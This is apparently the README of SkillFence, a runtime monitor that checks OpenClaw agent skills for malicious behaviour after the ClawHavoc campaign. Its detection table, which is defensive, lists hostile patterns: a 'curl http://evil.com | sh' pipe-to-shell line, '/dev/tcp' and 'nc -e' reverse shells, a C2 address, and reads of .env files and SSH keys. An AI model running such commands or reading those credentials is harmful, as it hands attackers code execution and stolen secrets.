125 lines
4.9 KiB
Markdown
125 lines
4.9 KiB
Markdown
# 🛡️ SkillFence — Runtime Skill Monitor for OpenClaw
|
|
|
|
**Watch what your skills actually do. Not what they claim to do.**
|
|
|
|
Scanners check code before install. SkillFence watches what code does after install. Network calls, file access, credential reads, process activity — all monitored and logged.
|
|
|
|
## The Problem
|
|
|
|
341 malicious skills were found on ClawHub (ClawHavoc campaign). Pre-install scanners caught them after the fact. But the Polymarket backdoor? It looked clean. The malicious `curl` was buried in a working market search function — it only triggered during normal use. No scanner would have caught it before it fired.
|
|
|
|
**Nobody is watching what skills do at runtime. SkillFence does.**
|
|
|
|
## What It Catches
|
|
|
|
| Threat | How | Example |
|
|
|--------|-----|---------|
|
|
| Known C2 servers | IP/domain matching | ClawHavoc's `54.91.154.110:13338` |
|
|
| Reverse shells | Process monitoring | `/dev/tcp` connections, `nc -e` |
|
|
| Crypto miners | Process monitoring | xmrig, cpuminer processes |
|
|
| curl\|sh attacks | Pattern matching | `curl http://evil.com \| sh` |
|
|
| Credential theft | File access monitoring | Reading `.env`, `openclaw.json`, SSH keys |
|
|
| Data exfiltration | Combined analysis | Network calls + sensitive file reads |
|
|
| Encoded payloads | Base64 detection | Obfuscated commands with decode ops |
|
|
|
|
## Install (30 seconds)
|
|
|
|
### Option 1: ClawHub (recommended)
|
|
|
|
```bash
|
|
clawhub install skillfence
|
|
```
|
|
|
|
### Option 2: Manual
|
|
|
|
```bash
|
|
cd ~/clawd/skills # or ~/.openclaw/skills
|
|
git clone https://github.com/deeqyaqub1-cmd/skillfence-openclaw skillfence
|
|
```
|
|
|
|
### Option 3: Copy-paste
|
|
|
|
Create `~/clawd/skills/skillfence/` and copy `SKILL.md` + `monitor.js` into it.
|
|
|
|
**No dependencies. No API keys. No config. Just Node.js.**
|
|
|
|
## Commands
|
|
|
|
```
|
|
/skillfence → Session status
|
|
/skillfence scan → Full system scan (skills + network + processes + credentials)
|
|
/skillfence scan <skill> → Scan a specific skill before installing
|
|
/skillfence watch → Quick runtime check
|
|
/skillfence log → View audit trail
|
|
```
|
|
|
|
## Full System Scan
|
|
|
|
Ask your OpenClaw: *"Run a security scan"*
|
|
|
|
SkillFence checks:
|
|
1. **All installed skills** — known C2 addresses, dangerous commands, credential access, data exfiltration patterns, encoded payloads
|
|
2. **Active network connections** — connections to known malicious servers, unusual ports on raw IPs
|
|
3. **Running processes** — reverse shells, crypto miners, remote code execution
|
|
4. **Sensitive file access** — recently accessed credentials, configs, keys, wallets
|
|
|
|
Results come with severity ratings:
|
|
- 🔴 **CRITICAL** — Known C2, active reverse shells, crypto miners. Act immediately.
|
|
- 🟠 **HIGH** — Data exfiltration, dangerous commands, credential access. Investigate now.
|
|
- 🟡 **MEDIUM** — Unusual connections, encoded payloads, recent credential reads. Review soon.
|
|
- 🟢 **CLEAN** — No issues found.
|
|
|
|
## Pre-Install Check
|
|
|
|
Before installing any new skill:
|
|
|
|
> "Check if the weather skill is safe"
|
|
|
|
SkillFence scans the skill's files and returns a verdict: DANGEROUS / SUSPICIOUS / REVIEW / CLEAN.
|
|
|
|
## Security
|
|
|
|
- **Read-only** — SkillFence monitors and reports. It never modifies, deletes, or executes anything. Credential checks only read file metadata (timestamps), never file contents.
|
|
- **No data leaves your machine** — all scanning happens locally. This skill never makes outbound network requests.
|
|
- **No API keys required** — works entirely offline
|
|
- **Open source** — read every line before you install
|
|
- **Audit trail** — every scan, alert, and block is logged with timestamps
|
|
|
|
## Honest Limitations
|
|
|
|
SkillFence runs as a skill at the same privilege level as other skills. This means:
|
|
|
|
- A sophisticated attacker could potentially detect and evade it
|
|
- Raw socket connections may bypass detection
|
|
- Novel attack techniques not in our pattern database won't be caught
|
|
- It's a **security camera, not a locked door**
|
|
|
|
But most attacks are unsophisticated. The entire ClawHavoc campaign used basic `curl`, `os.system`, and base64 chains. SkillFence catches all of that. Detection and deterrence beat zero monitoring.
|
|
|
|
## Pro ($9/mo)
|
|
|
|
Free tier includes all monitoring features, unlimited scans.
|
|
|
|
[SkillFence Pro](https://cascadeai.dev/skillfence) is a separate web dashboard that unlocks:
|
|
|
|
- 📊 Persistent threat dashboard across sessions
|
|
- 📧 Weekly security digest reports
|
|
- 🔧 Custom threat rules (add your own patterns)
|
|
- 🧩 Priority threat intelligence updates
|
|
|
|
**Pro features run on the CascadeAI web dashboard, not inside this skill.**
|
|
|
|
## Verify It Works
|
|
|
|
After installing, ask your OpenClaw:
|
|
|
|
> "Run a security scan on my skills"
|
|
|
|
If you see `🛡️ SkillFence | X skills scanned | 🟢 ALL CLEAR` — you're protected.
|
|
|
|
---
|
|
|
|
**Built for the OpenClaw community. Know what your skills are doing.**
|
|
|
|
[GitHub](https://github.com/deeqyaqub1-cmd/skillfence-openclaw) · [ClawHub](https://clawhub.com/deeqyaqub1-cmd/skillfence) · [Pro](https://cascadeai.dev/skillfence) · [Discord](https://discord.gg/cascadeai)
|